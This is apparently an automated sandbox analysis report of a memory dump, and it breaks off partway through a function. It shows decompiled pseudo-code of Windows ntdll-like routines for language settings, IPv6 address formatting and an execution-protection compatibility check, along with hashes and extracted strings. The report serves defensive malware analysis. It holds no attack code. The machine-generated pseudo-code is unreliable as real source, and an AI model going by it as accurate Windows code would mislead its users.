API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: d352ff96d432da3225dc93e752ff2a3a17f491a14f3392107f27f7745cb03815
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: ABD0A7717503087BE610FAE89C03F6632CC5B54B00F494074F949D73C3DA60F5004161

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01E38788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01E38788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01E38460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01E1E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01E3718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01E38460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01E3718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01E38460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01E38460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01E38460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01E3718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01E1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01E12340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01E2E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01E1E2A8(_t322,  &_v68, _v16);
								if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01E2E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01E1E2A8(_t322,  &_v68, _t236);
								if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01E3718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01E1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01E12340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01E2E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01E1E2A8(_v12,  &_v68, _v16);
							if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01E2E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01E1E2A8(_t322,  &_v68, _t269);
							if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01E3718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01E1E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01E12340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01E2E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01E1E2A8(_v12,  &_v68, _v16);
						if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01E2E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01E1E2A8(_t322,  &_v68, _t296);
						if(E01E35553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01E1E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x01e38788
0x01e38788
0x01e38791
0x01e38794
0x01e38798
0x01e3879b
0x01e3879e
0x01e387a1
0x01e387a4
0x01e387a7
0x01e387aa
0x01e387af
0x01e81ad3
0x01e38b0a
0x01e38b0d
0x01e38b13
0x01e38b19
0x01e38b1f
0x01e38b25
0x01e38b2b
0x01e38b31
0x01e38b37
0x01e38b3d
0x01e38b46
0x01e38b46
0x01e387c6
0x01e387d0
0x01e81ae0
0x01e81ae6
0x01e81af8
0x01e81af8
0x01e81afd
0x01e81afe
0x01e81b01
0x01e81b06
0x01e81b06
0x01e387d6
0x01e387f2
0x01e387f7
0x01e38807
0x01e3880a
0x01e3880f
0x01e38810
0x01e38813
0x01e38818
0x01e38818
0x01e3882c
0x01e38831
0x01e38838
0x01e38908
0x01e38920
0x01e389f0
0x01e38a08
0x01e38af6
0x01e38af6
0x01e38af8
0x01e38afb
0x01e81beb
0x01e81beb
0x01e38b04
0x01e81bf8
0x01e81c0e
0x01e81c13
0x01e81c16
0x01e81c16
0x01e81bf8
0x00000000
0x01e38b04
0x01e38a0e
0x01e38a11
0x01e38a14
0x01e38a15
0x01e38a18
0x01e38a22
0x01e38b59
0x01e38a28
0x01e38a3c
0x01e38a3c
0x01e38a42
0x01e81bb0
0x01e81b11
0x01e81b11
0x00000000
0x01e38a48
0x01e38a51
0x01e38a5b
0x01e38a5e
0x01e38a61
0x01e38a69
0x01e38a69
0x01e38a6d
0x00000000
0x00000000
0x01e38a74
0x01e38a7c
0x01e38a7d
0x01e38a91
0x01e38a93
0x01e38a93
0x01e38a98
0x01e38a9b
0x01e38aa1
0x01e38aa1
0x01e38aa4
0x01e38aaa
0x01e38ab1
0x01e38ac5
0x01e38ac7
0x01e38ac7
0x01e38ac5
0x01e38ace
0x01e81bc9
0x01e81bce
0x01e81bd2
0x01e81bd2
0x01e38ad8
0x01e38aeb
0x01e38aeb
0x01e38af0
0x01e38af4
0x00000000
0x01e38af4
0x01e38a42
0x01e38926
0x01e38929
0x01e3892c
0x01e3892d
0x01e38930
0x01e38935
0x01e3893a
0x01e38b51
0x01e38940
0x01e38954
0x01e38954
0x01e3895a
0x01e81b63
0x00000000
0x01e38960
0x01e38969
0x01e38973
0x01e38976
0x01e38979
0x01e3897e
0x01e38981
0x01e38981
0x01e38986
0x00000000
0x00000000
0x01e81b6e
0x01e81b74
0x01e81b7b
0x01e81b8f
0x01e81b91
0x01e81b91
0x01e81b99
0x01e81b9c
0x01e81ba2
0x01e81ba2
0x01e3898c
0x01e38992
0x01e38999
0x01e389ad
0x01e81ba8
0x01e81ba8
0x01e389ad
0x01e389b6
0x01e389c8
0x01e389cd
0x01e389d0
0x01e389d0
0x01e389d6
0x01e389e8
0x01e389e8
0x01e389ed
0x00000000
0x01e389ed
0x01e3895a
0x01e3883e
0x01e38841
0x01e38844
0x01e38845
0x01e38848
0x01e3884d
0x01e38852
0x01e38b49
0x01e38858
0x01e3886c
0x01e3886c
0x01e38872
0x01e81b0e
0x00000000
0x01e38878
0x01e38881
0x01e3888b
0x01e3888e
0x01e38891
0x01e38896
0x01e38899
0x01e38899
0x01e3889e
0x00000000
0x00000000
0x01e81b21
0x01e81b27
0x01e81b2e
0x01e81b42
0x01e81b44
0x01e81b44
0x01e81b4c
0x01e81b4f
0x01e81b55
0x01e81b55
0x01e388a4
0x01e388aa
0x01e388b1
0x01e388c5
0x01e81b5b
0x01e81b5b
0x01e388c5
0x01e388ce
0x01e388e0
0x01e388e5
0x01e388e8
0x01e388e8
0x01e388ee
0x01e38900
0x01e38900
0x01e38905
0x00000000
0x01e38905

APIs

_wcspbrk.LIBCMT ref: 01E38891
_wcspbrk.LIBCMT ref: 01E38979
_wcspbrk.LIBCMT ref: 01E38A61
_wcspbrk.LIBCMT ref: 01E38A9B
_wcspbrk.LIBCMT ref: 01E81B9C

Strings

Kernel-MUI-Language-Allowed, xrefs: 01E38827
Kernel-MUI-Number-Allowed, xrefs: 01E387E6
Kernel-MUI-Language-Disallowed, xrefs: 01E38914
Kernel-MUI-Language-SKU, xrefs: 01E389FC
WindowsExcludedProcs, xrefs: 01E387C1

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: a864dd30078a80cb6b0f7071475a06fcf58da1f79e635dbcceb079ce92345c9d
Instruction ID: 155342371b7d6ea8a469a7c18bd2b7e5618c17ab99bd2158fc17196e9b90f89a
Opcode Fuzzy Hash: a864dd30078a80cb6b0f7071475a06fcf58da1f79e635dbcceb079ce92345c9d
Instruction Fuzzy Hash: 1BF13DB2D0024AEFCF11EF98C984DEEBBB8FF58304F14656AE606A7210D7319A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01E513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E01E513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01E47707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1e12926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01E47707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1e19cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01E47707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01E47707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01E47707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01E47707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x01e513d5
0x01e513d9
0x01e513dc
0x01e513de
0x01e513e1
0x01e513e8
0x01e513ee
0x01e7e8fd
0x00000000
0x01e7e921
0x01e7e921
0x01e7e928
0x01e7e982
0x01e7e98a
0x00000000
0x01e7e99a
0x01e7e99e
0x01e7e9a3
0x01e7e9a8
0x01e7e9b9
0x01e7e978
0x00000000
0x01e7e978
0x01e7e98a
0x01e7e92a
0x01e7e931
0x01e7e944
0x01e7e944
0x01e7e950
0x01e7e954
0x01e7e959
0x01e7e95e
0x01e7e963
0x01e7e970
0x00000000
0x01e7e975
0x01e7e93b
0x01e7e980
0x00000000
0x01e7e980
0x01e7e942
0x01e7e94b
0x00000000
0x01e7e94b
0x00000000
0x01e7e942
0x01e513f4
0x01e513f4
0x01e513f9
0x01e513fc
0x01e513ff
0x01e51406
0x01e7e9cc
0x01e7e9d2
0x01e7e9d2
0x01e7e9cc
0x01e5140c
0x01e51411
0x01e51431
0x01e5143a
0x01e5143c
0x01e5143f
0x01e5143f
0x01e51442
0x01e51447
0x01e514a8
0x01e514ac
0x01e7e9e2
0x01e7e9e7
0x01e7e9ec
0x01e7ea05
0x01e7ea05
0x00000000
0x01e51449
0x00000000
0x01e51449
0x01e5144c
0x01e51459
0x01e51462
0x01e51469
0x01e5146a
0x01e51470
0x01e51473
0x01e51476
0x01e51476
0x01e51490
0x01e51495
0x01e5138e
0x01e51390
0x01e51397
0x01e51398
0x01e51399
0x01e513a1
0x01e513a4
0x01e513a4
0x01e51498
0x01e5149c
0x01e5149f
0x01e514a2
0x00000000
0x00000000
0x01e514a4
0x00000000
0x01e514a4
0x01e51413
0x01e51415
0x01e51416
0x01e51419
0x01e5141c
0x01e51422
0x01e513b7
0x01e513bc
0x01e513bf
0x01e513bf
0x01e513c2
0x01e51424
0x01e51424
0x01e51424
0x01e51427
0x01e5142b
0x01e5142c
0x01e5142c
0x01e5142c
0x00000000
0x01e5141c
0x01e51411

APIs

___swprintf_l.LIBCMT ref: 01E5146B
___swprintf_l.LIBCMT ref: 01E51490
___swprintf_l.LIBCMT ref: 01E7E970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01E7E9B0
::%hs%u.%u.%u.%u, xrefs: 01E7E967
:%u.%u.%u.%u, xrefs: 01E7E9F4
ffff:, xrefs: 01E7E94B

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f0a87a983974c27e5010ffdc7f3709d413443110d121fafde93e682caafb11d5
Instruction ID: efcf104cb1812ce0a569901eee8ca8c8f5b6530f449c2110f9c94013229393cc
Opcode Fuzzy Hash: f0a87a983974c27e5010ffdc7f3709d413443110d121fafde93e682caafb11d5
Instruction Fuzzy Hash: 576156B1D00696AADB35DF5DC8908BFBFB5EF94308B48E06DE9D647541D334A640CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01E47EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01E47EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1ef2088; // 0x76606d50
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01E47F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01E63F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01E1DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1ef4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01E63F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01E20D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01E63F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01E28375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01E63F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01E8E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01E63F92();
					_t38 = 1;
					L2:
					return E01E1E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x01e47f08
0x01e47f0f
0x01e47f12
0x01e47f1b
0x01e47f31
0x01e63ead
0x01e63eb4
0x00000000
0x00000000
0x01e63eba
0x01e63ecd
0x01e63ed2
0x01e63ee1
0x01e63ee7
0x01e63eec
0x01e63f12
0x01e63f18
0x01e63f1a
0x00000000
0x00000000
0x01e63f20
0x01e63f26
0x01e63f28
0x00000000
0x00000000
0x01e63f2e
0x01e63f30
0x00000000
0x00000000
0x01e63f3a
0x01e63f3b
0x01e63f53
0x01e63f64
0x01e63f69
0x01e63f6c
0x01e63f6d
0x01e63f6f
0x01e6e304
0x01e6e30f
0x01e6e315
0x01e6e31e
0x01e6e321
0x01e6e327
0x01e6e329
0x00000000
0x00000000
0x00000000
0x00000000
0x01e6e32f
0x01e6e32f
0x01e6e337
0x01e6e33a
0x01e6e33b
0x01e6e33d
0x01e6e33f
0x01e6e341
0x01e6e341
0x01e6e34e
0x01e6e353
0x01e6e358
0x01e6e35d
0x01e6e35f
0x00000000
0x00000000
0x01e6e365
0x01e6e365
0x01e6e368
0x01e6e36e
0x00000000
0x00000000
0x01e6e374
0x01e6e32f
0x01e63f75
0x01e63f7a
0x01e63f7c
0x01e63f7e
0x01e63f86
0x01e47f39
0x01e47f47
0x01e47f47
0x01e47f37
0x01e47f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01E63F12

Strings

Execute=1, xrefs: 01E63F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01E6E2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01E63F75
ExecuteOptions, xrefs: 01E63F04
CLIENT(ntdll): Processing section info %ws..., xrefs: 01E6E345
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01E63EC4
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01E63F4A

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 3617e40a9ce64b21fa296de1b7e7c64b424b73ff0d4e3da34bdabac2641a02bf
Instruction ID: a303a9b93a50e65cdc786140e70f6b9cc7d8671160fd1431814dc07fb8fcc095
Opcode Fuzzy Hash: 3617e40a9ce64b21fa296de1b7e7c64b424b73ff0d4e3da34bdabac2641a02bf
Instruction Fuzzy Hash: C9410732A8061D7BDB20DA94DC85FDE73BCAB14704F4014A9E608A6081E7709A858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01E50B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01E50B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
